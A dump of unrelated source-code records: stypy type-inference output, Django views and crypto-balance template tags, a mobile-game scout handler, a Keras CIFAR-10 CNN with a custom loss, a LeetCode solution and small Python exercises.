# Processing the call arguments (line 52)
# Getting the type of 'X' (line 52)
X_459842 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 52, 22), 'X', False)
# Processing the call keyword arguments (line 52)
kwargs_459843 = {}
# Getting the type of 'csr_matrix' (line 52)
csr_matrix_459841 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 52, 11), 'csr_matrix', False)
# Calling csr_matrix(args, kwargs) (line 52)
csr_matrix_call_result_459844 = invoke(stypy.reporting.localization.Localization(__file__, 52, 11), csr_matrix_459841, *[X_459842], **kwargs_459843)
# Assigning a type to the variable 'Xcsr' (line 52)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 52, 4), 'Xcsr', csr_matrix_call_result_459844)
# Call to range(...): (line 54)
# Processing the call arguments (line 54)
# Getting the type of 'N' (line 54)
N_459846 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 54, 19), 'N', False)
# Processing the call keyword arguments (line 54)
kwargs_459847 = {}
# Getting the type of 'range' (line 54)
range_459845 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 54, 13), 'range', False)
# Calling range(args, kwargs) (line 54)
range_call_result_459848 = invoke(stypy.reporting.localization.Localization(__file__, 54, 13), range_459845, *[N_459846], **kwargs_459847)
# Testing the type of a for loop iterable (line 54)
is_suitable_for_loop_condition(stypy.reporting.localization.Localization(__file__, 54, 4), range_call_result_459848)
# Getting the type of the for loop variable (line 54)
for_loop_var_459849 = get_type_of_for_loop_variable(stypy.reporting.localization.Localization(__file__, 54, 4), range_call_result_459848)
# Assigning a type to the variable 'i' (line 54)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 54, 4), 'i', for_loop_var_459849)
# SSA begins for a for statement (line 54)
module_type_store = SSAContext.create_ssa_context(module_type_store, 'for loop')
# Assigning a Subscript to a Name (line 55):
# Obtaining the type of the subscript
slice_459850 = ensure_slice_bounds(stypy.reporting.localization.Localization(__file__, 55, 18), None, None, None)
# Getting the type of 'i' (line 55)
i_459851 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 55, 23), 'i')
# Getting the type of 'i' (line 55)
i_459852 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 55, 25), 'i')
int_459853 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 55, 29), 'int')
# Applying the binary operator '+' (line 55)
result_add_459854 = python_operator(stypy.reporting.localization.Localization(__file__, 55, 25), '+', i_459852, int_459853)
slice_459855 = ensure_slice_bounds(stypy.reporting.localization.Localization(__file__, 55, 18), i_459851, result_add_459854, None)
# Getting the type of 'X' (line 55)
X_459856 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 55, 18), 'X')
# Obtaining the member '__getitem__' of a type (line 55)
getitem___459857 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 55, 18), X_459856, '__getitem__')
# Calling the subscript (__getitem__) to obtain the elements type (line 55)
subscript_call_result_459858 = invoke(stypy.reporting.localization.Localization(__file__, 55, 18), getitem___459857, (slice_459850, slice_459855))
# Assigning a type to the variable 'arr_col' (line 55)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 55, 8), 'arr_col', subscript_call_result_459858)
# Assigning a Call to a Name (line 56):
# Call to getcol(...): (line 56)
# Processing the call arguments (line 56)
# Getting the type of 'i' (line 56)
i_459861 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 56, 30), 'i', False)
# Processing the call keyword arguments (line 56)
kwargs_459862 = {}
# Getting the type of 'Xcsr' (line 56)
Xcsr_459859 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 56, 18), 'Xcsr', False)
# Obtaining the member 'getcol' of a type (line 56)
getcol_459860 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 56, 18), Xcsr_459859, 'getcol')
# Calling getcol(args, kwargs) (line 56)
getcol_call_result_459863 = invoke(stypy.reporting.localization.Localization(__file__, 56, 18), getcol_459860, *[i_459861], **kwargs_459862)
# Assigning a type to the variable 'csr_col' (line 56)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 56, 8), 'csr_col', getcol_call_result_459863)
# Call to assert_array_almost_equal(...): (line 58)
# Processing the call arguments (line 58)
# Getting the type of 'arr_col' (line 58)
arr_col_459865 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 58, 34), 'arr_col', False)
# Call to toarray(...): (line 58)
# Processing the call keyword arguments (line 58)
kwargs_459868 = {}
# Getting the type of 'csr_col' (line 58)
csr_col_459866 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 58, 43), 'csr_col', False)
# Obtaining the member 'toarray' of a type (line 58)
toarray_459867 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 58, 43), csr_col_459866, 'toarray')
# Calling toarray(args, kwargs) (line 58)
toarray_call_result_459869 = invoke(stypy.reporting.localization.Localization(__file__, 58, 43), toarray_459867, *[], **kwargs_459868)
# Processing the call keyword arguments (line 58)
kwargs_459870 = {}
# Getting the type of 'assert_array_almost_equal' (line 58)
assert_array_almost_equal_459864 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 58, 8), 'assert_array_almost_equal', False)
# Calling assert_array_almost_equal(args, kwargs) (line 58)
assert_array_almost_equal_call_result_459871 = invoke(stypy.reporting.localization.Localization(__file__, 58, 8), assert_array_almost_equal_459864, *[arr_col_459865, toarray_call_result_459869], **kwargs_459870)
# Call to assert_(...): (line 59)
# Processing the call arguments (line 59)
# Call to type(...): (line 59)
# Processing the call arguments (line 59)
# Getting the type of 'csr_col' (line 59)
csr_col_459874 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 59, 21), 'csr_col', False)
# Processing the call keyword arguments (line 59)
kwargs_459875 = {}
# Getting the type of 'type' (line 59)
type_459873 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 59, 16), 'type', False)
# Calling type(args, kwargs) (line 59)
type_call_result_459876 = invoke(stypy.reporting.localization.Localization(__file__, 59, 16), type_459873, *[csr_col_459874], **kwargs_459875)
# Getting the type of 'csr_matrix' (line 59)
csr_matrix_459877 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 59, 33), 'csr_matrix', False)
# Applying the binary operator 'is' (line 59)
result_is__459878 = python_operator(stypy.reporting.localization.Localization(__file__, 59, 16), 'is', type_call_result_459876, csr_matrix_459877)
# Processing the call keyword arguments (line 59)
kwargs_459879 = {}
# Getting the type of 'assert_' (line 59)
assert__459872 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 59, 8), 'assert_', False)
# Calling assert_(args, kwargs) (line 59)
assert__call_result_459880 = invoke(stypy.reporting.localization.Localization(__file__, 59, 8), assert__459872, *[result_is__459878], **kwargs_459879)
# SSA join for a for statement
module_type_store = module_type_store.join_ssa_context()
# ################# End of 'test_csr_getcol(...)' code ##################
# Teardown call information
teardown_call_information(localization, arguments)
# Storing the return type of function 'test_csr_getcol' in the type store
# Getting the type of 'stypy_return_type' (line 47)
stypy_return_type_459881 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 47, 0), 'stypy_return_type')
module_type_store.store_return_type_of_current_context(stypy_return_type_459881)
# Destroy the current context
module_type_store = module_type_store.close_function_context()
# Return type of the function 'test_csr_getcol'
return stypy_return_type_459881
# Assigning a type to the variable 'test_csr_getcol' (line 47)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 47, 0), 'test_csr_getcol', test_csr_getcol)
# ################# End of the type inference program ##################
module_errors = stypy.errors.type_error.StypyTypeError.get_error_msgs()
module_warnings = stypy.errors.type_warning.TypeWarning.get_warning_msgs()
|
991,620 | e404554d5315ce4322bc76de7ccccb1b6bdd163f | class Test():
    def __init__(self):
        # Each instance gets its OWN fresh list, so mutating one
        # instance's ``x`` does not affect another instance (contrast
        # with a shared class attribute, which the demo below probes).
        self.x=[1,2,3]
# Demo: instance attributes are per-instance. Appending to one Test
# object's list leaves the other object's list untouched.
first = Test()
second = Test()
first.x.append([1, 2, 3])
print(first.x, second.x)

# Same check with two plain, independently created lists.
left = []
right = []
left.append([1, 2, 3])
991,621 | 80fe0d4dd09b9d7179eb913d793fc9a4fcdd1c29 | import json
import requests
import datetime
from django import template
from apps.accounts.models import User
from apps.coins.utils import *
from apps.coins.models import Coin, NewCoin, EthereumTokenWallet
register = template.Library()
@register.simple_tag
def get_balance_BTC(user):
balance = get_balance(user, "BTC")
if not balance:
balance = 0
return balance
@register.filter
def rcv(mapping, key):
return mapping.get('transactions_rcv_'+key, '')
@register.filter
def snd(mapping, key):
return mapping.get('transactions_snd_'+key, '')
@register.simple_tag
def get_bal_coin(key, user):
try:
balance = get_balance(user, key)
except:
return 0
if not balance:
balance = 0
return balance
@register.simple_tag
def get_pk_bal_coin(key, pk):
user = User.objects.get(pk=pk)
print(user)
print(key)
try:
balance = get_balance(user, key)
except:
return 0
if not balance:
balance = 0
return balance
@register.filter(name='unix_to_datetime')
def unix_to_datetime(value):
    """Convert a Unix timestamp to a naive local ``datetime``.

    Values that cannot be parsed as a timestamp (e.g. an already-formatted
    string, or None) are returned unchanged. The original bare ``except:``
    is narrowed to the exceptions ``int()`` / ``fromtimestamp()`` actually
    raise.
    """
    try:
        return datetime.datetime.fromtimestamp(int(value))
    except (TypeError, ValueError, OverflowError, OSError):
        return value
@register.simple_tag
def percentage(count):
    """Express *count* as a percentage of a 100,000 total."""
    share = int(count) / 100000
    return share * 100
@register.simple_tag
def coin_code_to_name(code):
    """Resolve a coin *code* to the matching NewCoin's display name."""
    coin = NewCoin.objects.get(code=code)
    return coin.name
@register.simple_tag
def get_eth_balance(symbol, user):
    """Return the ether balance of the user's first wallet address for *symbol*.

    Returns 0.0 when the wallet/address is missing or the node call fails.
    NOTE(review): ``w3`` and ``Web3`` are not imported in this module's
    visible imports — presumably they arrive via the star import from
    ``apps.coins.utils``; confirm. Bare ``except:`` narrowed to
    ``Exception``.
    """
    try:
        wallet = EthereumTokenWallet.objects.get(
            user=user, name__contract_symbol=symbol)
        address = wallet.addresses.all()[0].address
        checksummed = Web3.toChecksumAddress(address)
        return float(w3.fromWei(w3.eth.getBalance(checksummed), "ether"))
    except Exception:  # missing wallet, empty address list, or RPC failure
        return 0.0
|
991,622 | 59209b06ca4f6ecd6e5c8668607b2134e7b82078 | class Bunker:
    def __init__(self):
        # Independent inventories: survivors are people, supplies hold
        # food/water items, medicine holds painkillers/salves. The typed
        # views are exposed through the properties of this class.
        self.survivors = []
        self.supplies = []
        self.medicine = []
@property
def food(self):
foods = [supply for supply in self.supplies if supply.__class__.__name__ == "FoodSupply"]
if not foods:
raise IndexError("There are no food supplies left!")
return foods
@property
def water(self):
water_objects = [water_obj for water_obj in self.supplies if water_obj.__class__.__name__ == "WaterSupply"]
if not water_objects:
raise IndexError("There are no water supplies left!")
return water_objects
@property
def painkillers(self):
painkillers_objects = [painkiller_obj for painkiller_obj in self.medicine
if painkiller_obj.__class__.__name__ == "Painkiller"]
if not painkillers_objects:
raise IndexError("There are no painkillers left!")
return painkillers_objects
@property
def salves(self):
salve_objects = [salve_obj for salve_obj in self.medicine if salve_obj.__class__.__name__ == "Salve"]
if not salve_objects:
raise IndexError("There are no salves left!")
return salve_objects
def add_survivor(self, survivor):
try:
survivor_name = [s.name for s in self.survivors if s.name == survivor.name][0]
raise IndexError(f"Survivor with name {survivor_name} already exists.")
except IndexError:
self.survivors.append(survivor)
def add_supply(self, supply):
self.supplies.append(supply)
def add_medicine(self, medicine):
self.medicine.append(medicine)
def heal(self, survivor, medicine_type):
healing_medicine = self.painkillers.pop() if medicine_type == "Painkiller" else self.salves.pop()
if survivor.needs_healing:
healing_medicine.apply(survivor)
self.medicine.remove(healing_medicine)
return f"{survivor.name} healed successfully with {medicine_type}"
def sustain(self, survivor, sustenance_type):
supply = self.food.pop() if sustenance_type == "FoodSupply" else self.water.pop()
if survivor.needs_sustenance:
supply.apply(survivor)
self.supplies.remove(supply)
return f"{survivor.name} sustained successfully with {sustenance_type}"
def next_day(self):
for survivor in self.survivors:
survivor.needs -= survivor.age * 2
survivor.sustain(survivor, "FoodSupply")
survivor.sustain(survivor, "WaterSupply") |
991,623 | 99454b0b3f4094356b3584b5d0e6f6a7e6c94539 | from authentification.queries import verify_password
from product.models import Product
from django.shortcuts import render, redirect
from authentification.views import verify_login
from product.queries import retrieve_info, add_product, delete
# Create your views here.
@verify_login
def update_products(request, id):
    """Render the add/update form on GET; persist the product on POST."""
    if request.method == 'POST':
        saved = add_product(request.POST, id)
        return redirect('product', id=saved.id)
    if request.method == 'GET':
        # id == 0 means "create a new product" (see choose_title).
        product = retrieve_info(id)
        title, big_title = choose_title(id)
        context = {'product': product, 'title': title, 'big_title': big_title, 'id': id}
        return render(request, 'update_products.html', context)
def choose_title(id):
    """Return (page title, French heading): "add" wording for id 0, "update" otherwise."""
    creating = (id == 0)
    if creating:
        return "Add Product", "Ajouter un nouveau Produit"
    return "Update", "Modifier un Produit"
@verify_login
def product(request, id):
    """Show the detail page of a single product."""
    return render(request, 'product.html', {'product': retrieve_info(id)})
@verify_login
def all_products(request):
    """List every product, ordered by primary key."""
    products = list(Product.objects.all().order_by('id'))
    return render(request, 'all_products.html', {'all_products': products})
@verify_login
def delete_product(request, id):
    """Delete the product with this id, then send the user back home."""
    delete(id)
    return redirect('home')
991,624 | ac5f7ed805cc41ddfa4e627d24bdebfc1f1ec604 | # -*- coding: utf-8 -*-
from platinumegg.app.cabaret.util.cabareterror import CabaretError
from platinumegg.app.cabaret.util.api import BackendApi
import settings
from platinumegg.app.cabaret.util.url_maker import UrlMaker
from platinumegg.app.cabaret.models.Player import PlayerScout, PlayerAp,\
PlayerExp, PlayerRegist, PlayerFriend, PlayerDeck
from platinumegg.app.cabaret.util.db_util import ModelRequestMgr
from platinumegg.app.cabaret.util import db_util
from platinumegg.app.cabaret.views.application.scout.base import ScoutHandler
import settings_sub
from defines import Defines
from platinumegg.app.cabaret.models.Scout import ScoutPlayData
import urllib
class Handler(ScoutHandler):
    """Execute a scout.

    URL arguments:
        the ID of the scout to execute (plus an optional scout key and an
        optional effect-skip query flag).
    """

    @classmethod
    def getViewerPlayerClassList(cls):
        # No extra player sub-models are needed to build the viewer here.
        return []

    def redirectWithError(self, err):
        """On PC raise the error as-is; on mobile return to the scout top page."""
        if self.is_pc:
            raise err
        else:
            url = self.makeAppLinkUrlRedirect(UrlMaker.scout())
            self.appRedirect(url)

    def process(self):
        try:
            # Scout ID (plus optional key and skip flag) from the URL.
            args = self.getUrlArgs('/scoutdo/')
            scoutid = int(args.get(0)) or None
            scoutkey = urllib.unquote(args.get(1) or '')
            str_flag_skip = self.request.get(Defines.URLQUERY_SKIP)
            if not str_flag_skip in ('1', '0'):
                str_flag_skip = None
        except:
            raise CabaretError(u'引数が想定外です', CabaretError.Code.ILLEGAL_ARGS)

        v_player = self.getViewerPlayer()

        # Effect-skip flag: persist it when explicitly passed, else load the saved value.
        if str_flag_skip:
            flag_skip = bool(int(str_flag_skip))
            BackendApi.set_scoutskip_flag(v_player.id, flag_skip)
        else:
            flag_skip = BackendApi.get_scoutskip_flag(v_player.id)

        model_mgr = self.getModelMgr()
        using = settings.DB_DEFAULT

        # Master data.
        scoutmaster = None
        if scoutid:
            scoutmasterlist = BackendApi.get_scouts(model_mgr, [scoutid], using)
            scoutmaster = scoutmasterlist[0] if scoutmasterlist else None
        if scoutmaster is None:
            raise CabaretError(u'不正なアクセスです', CabaretError.Code.ILLEGAL_ARGS)

        areamaster = BackendApi.get_area(model_mgr, scoutmaster.area, using)
        if areamaster is None:
            self.redirectWithError(CabaretError(u'閲覧できないエリアです', CabaretError.Code.ILLEGAL_ARGS))
            return

        # Check the player is allowed to play this scout.
        if not BackendApi.check_scout_playable(model_mgr, scoutmaster, v_player, using):
            # Clear conditions are not met.
            self.redirectWithError(CabaretError(u'閲覧できないエリアです', CabaretError.Code.ILLEGAL_ARGS))
            return

        if not scoutkey:
            scoutkey = BackendApi.get_scoutkey(model_mgr, v_player.id, scoutmaster.id, using)

        # Check SHOWTIME (raid-event champagne call) state.
        raideventmaster = BackendApi.get_current_raideventmaster(model_mgr, using=using)
        if raideventmaster is None or raideventmaster.flag_dedicated_stage:
            champagnecall_start = False
            champagnecall = False
        else:
            champagnecall_start = BackendApi.get_raidevent_is_champagnecall_start(model_mgr, v_player.id, using=using)
            champagnecall = not champagnecall_start and BackendApi.get_raidevent_is_champagnecall(model_mgr, v_player.id, using=using)

        # Execute the scout inside a DB transaction.
        champagnecall_started = False
        try:
            model_mgr, playdata = db_util.run_in_transaction(self.tr_write, v_player.id, scoutmaster, scoutkey, champagnecall, champagnecall_start)
            model_mgr.write_end()
            champagnecall_started = bool(playdata.result.get('champagne'))
        except CabaretError, err:
            if err.code == CabaretError.Code.ALREADY_RECEIVED:
                model_mgr.delete_models_from_cache(ScoutPlayData, [ScoutPlayData.makeID(v_player.id, scoutmaster.id)])
            else:
                # Execution failed.
                if settings_sub.IS_DEV:
                    # In dev, re-raise so broken master data is caught during testing.
                    raise
                # In production, reaching here is assumed to be an illegal access.
                self.redirectWithError(CabaretError(u'閲覧できないエリアです', CabaretError.Code.ILLEGAL_ARGS))
                return

        # Choose the result page: skip the animation when the flag is set.
        if flag_skip:
            url = UrlMaker.scoutresultanim(scoutmaster.id, scoutkey, 0)
        else:
            url = UrlMaker.scoutanim(scoutmaster.id, scoutkey)

        if settings_sub.IS_BENCH:
            self.response.end()
        else:
            if champagnecall_started:
                params = BackendApi.make_raidevent_champagnecall_effectparams(self, raideventmaster, url)
                if params:
                    # Jump to the champagne (SHOWTIME) effect page.
                    effectpath = 'raidevent/showtime/effect.html'
                    self.appRedirectToEffect(effectpath, params)
                    return
            self.appRedirect(self.makeAppLinkUrlRedirect(url))

    def tr_write(self, uid, scoutmaster, scoutkey, champagnecall, champagnecall_start):
        """Transaction body: load the player models, run the scout, flush writes."""
        model_mgr = ModelRequestMgr(loginfo=self.addloginfo)
        player = BackendApi.get_players(self, [uid], [PlayerAp, PlayerScout, PlayerRegist, PlayerExp, PlayerFriend, PlayerDeck], model_mgr=model_mgr)[0]
        playdata = BackendApi.tr_do_scout(model_mgr, player, scoutmaster, scoutkey, champagnecall=champagnecall, champagnecall_start=champagnecall_start)
        model_mgr.write_all()
        return model_mgr, playdata
def main(request):
    """View entry point: delegate the request to Handler."""
    return Handler.run(request)
|
991,625 | 4b6df09e6c7f37734dbd2c71e13cb35a8d47ee4a | print("enter num")
num = int(input())  # the number whose digit count we report
var = 0  # NOTE(review): unused at module level; fun() shadows it with a local
def fun(num):
    """Return the number of decimal digits in ``num``.

    Handles negatives by taking the absolute value and treats 0 as having
    one digit. (The original returned 0 for input 0 and never terminated
    for negatives, because ``-1 // 10 == -1`` in Python.)
    """
    num = abs(num)
    if num == 0:
        return 1
    digits = 0
    while num != 0:
        num //= 10
        digits += 1
    return digits
print(fun(num))  # digit count of the entered number
|
991,626 | 21d7d1197b99a3747b2057e11b4f53a94b397dbc | # Przekopiuj zawartość import this do zmiennej.
# The Zen of Python (the output of ``import this``), used as the working text sample.
a = """The Zen of Python, by Tim Peters
Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
Sparse is better than dense.
Readability counts.
Special cases aren't special enough to break the rules.
Although practicality beats purity.
Errors should never pass silently.
Unless explicitly silenced.
In the face of ambiguity, refuse the temptation to guess.
There should be one-- and preferably only one --obvious way to do it.
Although that way may not be obvious at first unless you're Dutch.
Now is better than never.
Although never is often better than *right* now.
If the implementation is hard to explain, it's a bad idea.
If the implementation is easy to explain, it may be a good idea.
Namespaces are one honking great idea -- let's do more of those!"""
# Count the occurrences of the word "better".
word = 'better'
# Fixed: use the ``word`` variable instead of repeating the literal.
print(word, 'występuje w tekście:', a.count(word), 'razy')
# Remove the asterisk symbol from the text.
symbol = '*'
# Fixed: use the ``symbol`` variable instead of repeating the literal.
a_n = a.replace(symbol, '')
# print(a_n)
# Replace a single occurrence of "explain" with "understand".
print(a.count('explain'))
a_n2 = a.replace('explain', 'understand', 1)  # count=1 limits to the first occurrence
print(a_n2.count('explain'))
# print(a_n2)
# Remove the spaces by joining every word with a hyphen.
a_n3 = a.replace(' ', '-')
# print(a_n3)
# Split the text into separate sentences on the period character.
# Fixed per the author's own "fix using split" note: the previous version
# replaced spaces with dots instead of splitting on '.'.
n4_a = a.split('.')
print(n4_a)
991,627 | bf48143548db120c645772df2e2f998ed210076c | # https://leetcode.com/problems/find-positive-integer-solution-for-a-given-equation/
class Solution(object):
    def findSolution(self, customfunction, z):
        """Return all positive-integer pairs [x, y] with customfunction.f(x, y) == z.

        Explicit-stack depth-first search from (1, 1), stepping to (x+1, y)
        and (x, y+1) while f(x, y) < z; f is monotonically increasing in
        both arguments per the problem statement.
        """
        pairs = []
        visited = set()
        stack = [(1, 1)]
        while stack:
            x, y = stack.pop()
            if (x, y) in visited:
                continue
            visited.add((x, y))
            value = customfunction.f(x, y)
            if value == z:
                pairs.append([x, y])
            elif value < z:
                # Push (x, y+1) first so (x+1, y) is explored first,
                # matching the recursive pre-order of the original.
                stack.append((x, y + 1))
                stack.append((x + 1, y))
        return pairs
|
991,628 | ac29ffc3b933c6bd2090cea6dbf6ba0ccb8ad54f | #doCalc()
# APDataArray[
# AP[
# <Latitude(+- deg)>
# <Longitude(+- deg)>
# <Altitude(ft)>
# <DistanceToAP(ratio)>
# ]
# ... (4x APs min)
# ]
import triangulation

t = triangulation.triangulation()

# One row per access point: [latitude (+- deg), longitude (+- deg),
#                            altitude (ft), distance-to-AP]
data = [
    [46.717108333333300, -116.971675000000000, 2591, 708.04],
    [46.716822222222200, -116.973625000000000, 2585, 712.57],
    [46.717166666666700, -116.975325000000000, 2586, 790.18],
    [46.718202777777800, -116.974725000000000, 2598, 438.13],
]

res = t.doCalc(data)
t.printObj(res)
t.printObj(data)
#t.rotatePointAboutOrigin(10, 0, 75);
#t.rotatePointAboutOrigin(10, 10, 90);
#t.rotatePointAboutOrigin(0, 10, 90);
#t.rotatePointAboutOrigin(-10, 10, 90);
#t.rotatePointAboutOrigin(-10, 0, 90);
#t.rotatePointAboutOrigin(-10, -10, 90);
#t.rotatePointAboutOrigin(0, -10, 90);
#t.rotatePointAboutOrigin(10, -10, 90);
|
991,629 | ee14b4e528f7ca848ca45be3e3eeedc62b2c79ba |
# Maps a two-digit frequency code to its display hex color.
# NOTE(review): codes '06' and '89' share '#ee188d' -- confirm that is intended.
frequency_colors = {'01': '#77C000', '06': '#ee188d', '10': '#03aa87', '19': '#f46817', '37': "#7b7bc6", '89': '#ee188d'}
|
991,630 | 358af60f9a9e5ff455bb4464ef1a6fb3db87e566 | # Loads Cifar10. and fits a simple cnn. Uses a custom_loss
# Custom loss has been DIY softmax loss (cross entropy) so can verify with original
import numpy as np
# import matplotlib.pyplot as plt
# import tensorflow as tf
import keras
from keras import backend as K
import code
import time
import cv2
import math
# import matplotlib.pyplot as plt
from viz_utils import labels_to_logits
def custom_loss(y_true, y_pred):
    """DIY categorical cross-entropy, for verification against Keras' builtin.

    y_true: one-hot targets; y_pred: softmax outputs. The 1E-6 guards
    log(0); the clamp at zero absorbs the tiny negative values the epsilon
    can introduce when a predicted probability is exactly 1.
    """
    u = -K.sum(y_true * K.log(y_pred + 1E-6), -1)
    return K.maximum(0., u)
if False:  # Disabled scratch block: runs custom_loss through a Lambda layer to sanity-check it.
    y_true = keras.layers.Input(shape=(10,))
    y_pred = keras.layers.Input(shape=(10,))
    # u = custom_loss( y_true, y_pred )
    u = keras.layers.Lambda(custom_loss)([y_true, y_pred])
    model = keras.models.Model(inputs=[y_true, y_pred], outputs=u)
    model.summary()
    keras.utils.plot_model(model, show_shapes=True)

    # Two hand-built one-hot targets and predictions.
    a = np.zeros((2, 10))
    a[0, 1] = 1
    a[1, 9] = 1
    b = np.zeros((2, 10))  # np.random.randint( 10, size=(2,10) )
    b[0, 4] = 0.05; b[0, 1] = 0.95
    b[1, 8] = 1
    out = model.predict([a, b])
    quit()
#-----------------------------------------------------------------------------
# Data
# Load CIFAR-10 (Keras caches the download locally).
cifar10 = keras.datasets.cifar10
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
# x_train: 50K x 32x32x3 images
# y_train: 50K x 1 integer labels
#-----------------------------------------------------------------------------
# Model
model = keras.Sequential()
# Block 1: two 3x3 conv layers (32 filters) + 2x2 max-pool.
model.add(keras.layers.Conv2D(32, (3, 3), activation='relu', padding='same', input_shape=(32, 32, 3)))
model.add(keras.layers.Conv2D(32, (3, 3), activation='relu', padding='same'))
model.add(keras.layers.MaxPooling2D(pool_size=(2, 2)))
# Block 2: 64 filters.
# NOTE(review): the input_shape kwargs on these later Conv2D layers look like
# copy-paste leftovers; confirm Keras ignores input_shape after the first layer.
model.add(keras.layers.Conv2D(64, (3, 3), activation='relu', padding='same', input_shape=(32, 32, 1)))
model.add(keras.layers.Conv2D(64, (3, 3), activation='relu', padding='same'))
model.add(keras.layers.MaxPooling2D(pool_size=(2, 2)))
# Block 3: 128 filters.
model.add(keras.layers.Conv2D(128, (3, 3), activation='relu', padding='same', input_shape=(32, 32, 1)))
model.add(keras.layers.Conv2D(128, (3, 3), activation='relu', padding='same'))
model.add(keras.layers.MaxPooling2D(pool_size=(2, 2)))
# Classifier head: flatten -> dense -> 10-way softmax.
model.add(keras.layers.Flatten())
model.add(keras.layers.Dense(128, activation='relu'))
model.add(keras.layers.Dense(10, activation='softmax'))
model.summary()
keras.utils.plot_model(model, show_shapes=True)
#-----------------------------------------------------------------------------
# Compile
# optimizer = tf.keras.optimizers.Adam(lr=1e-5)
optimizer = keras.optimizers.RMSprop(lr=1e-4)
model.compile(optimizer=optimizer,
# loss='categorical_crossentropy',
loss=custom_loss,
metrics=['accuracy'])
model.fit( x=x_train, y=labels_to_logits( y_train ),
epochs=5, batch_size=32, verbose=1, validation_split=0.1 )
model.save( 'cifar10_cnn_customloss.keras' )
#
# #----------------------------------------------------------------------------
# # Iterations
# if True: # Simple 1 shot
#
# tb = tf.keras.callbacks.TensorBoard( log_dir='cifar10_cnn.logs', histogram_freq=1, write_grads=True, write_images=True )
#
# history = model.fit(x=x_train.reshape( x_train.shape[0], x_train.shape[1], x_train.shape[2], 3),
# y=labels_to_logits(y_train),
# epochs=5, batch_size=128, verbose=1,
# callbacks=[tb], validation_split=0.1)
# print 'save learned model'
# model.save( 'cifar10_cnn.keras' )
# code.interact( local=locals() )
#
#
# if False: #
# x_train_1 = x_train[ 0:25000, :, : , : ]
# y_train_1 = y_train[ 0:25000, : ]
# x_train_2 = x_train[ 25000:, :, : , : ]
# y_train_2 = y_train[ 25000:, : ]
#
# model.fit(x=x_train_1,
# y=labels_to_logits(y_train_1),
# epochs=10, batch_size=128, verbose=2)
#
# model.fit(x=x_train_2,
# y=labels_to_logits(y_train_2),
# epochs=10, batch_size=128, verbose=2)
#
# print 'save learned model'
# model.save( 'cifar10_cnn.keras' )
#
#
# if False:
# print 'load pretrained model'
# model.load_weights( 'cifar10_cnn.keras' )
#
#
# #---------------------------------------------------------------------------
# # Evaluate
# score = model.evaluate( x_test, labels_to_logits(y_test), verbose=1 )
# print 'Test Loss: ', score[0]
# print 'Accuracy : ', score[1]
#
#
#
# #---------------------------------------------------------------------------
# # Predict
# for _ in range(30):
# r = np.random.randint( x_test.shape[0] )
# pred_outs = model.predict( x_test[r:r+1,:,:,:] )
# print 'r=', r
# print 'predicted = ', pred_outs.argmax(),
# print 'ground truth = ', y_test[r],
# print ''
# cv2.imshow( 'test image', x_test[r,:,:,:].astype('uint8') )
# cv2.waitKey(0)
|
991,631 | 0c6382d308a89bf74d114ba8ef73e9cd429162e1 | from Comentario import Comentario
import unicodedata
import json
#DEFINIMOS LA CLASE JUEGO
class Juego:
    """A game in the catalogue: metadata, categories and user comments."""

    def __init__(self, id, nombre, anio, precio, categoria1, categoria2, categoria3, foto, banner, descripcion):
        self.id = id
        self.nombre = nombre
        self.anio = anio
        self.precio = precio
        self.categoria1 = categoria1
        self.categoria2 = categoria2
        self.categoria3 = categoria3
        self.foto = foto
        self.banner = banner
        self.descripcion = descripcion
        self.comentarios = []

    def modificar_Juego(self, nombre, anio, precio, categoria1, categoria2, categoria3, foto, banner, descripcion):
        """Update every field of the game except its id and its comments."""
        self.nombre = nombre
        self.anio = anio
        self.precio = precio
        self.categoria1 = categoria1
        self.categoria2 = categoria2
        self.categoria3 = categoria3
        self.foto = foto
        self.banner = banner
        self.descripcion = descripcion

    def agregar_Comentario(self, cadena, UserName, fecha):
        """Append a new Comentario to the game's comment list."""
        self.comentarios.append(Comentario(cadena, UserName, fecha))

    @staticmethod
    def _normalizar(texto):
        """ASCII-fold, trim and lowercase text for accent/case-insensitive comparison."""
        return unicodedata.normalize('NFKD', texto).encode('ASCII', 'ignore').strip().lower()

    def comprobar_categoria(self, valor):
        """Return the game's id when ``valor`` matches a non-empty category
        (accent- and case-insensitively); otherwise return False.

        Refactored: the original repeated the normalize/compare expression
        three times and only checked for the empty category after matching.
        """
        objetivo = self._normalizar(valor)
        for categoria in (self.categoria1, self.categoria2, self.categoria3):
            # Empty categories never match, even against an empty query.
            if categoria != "" and self._normalizar(categoria) == objetivo:
                return self.id
        return False

    def devolver_comentarios(self):
        """Return ALL of the game's comments serialized as a JSON array."""
        return json.dumps([comentario.dump() for comentario in self.comentarios])

    def dump(self):
        """Return the game's metadata as a JSON-serializable dict (comments excluded)."""
        return {
            'id': self.id,
            'nombre': self.nombre,
            'año': self.anio,
            'precio': self.precio,
            'categoria1': self.categoria1,
            'categoria2': self.categoria2,
            'categoria3': self.categoria3,
            'foto': self.foto,
            'banner': self.banner,
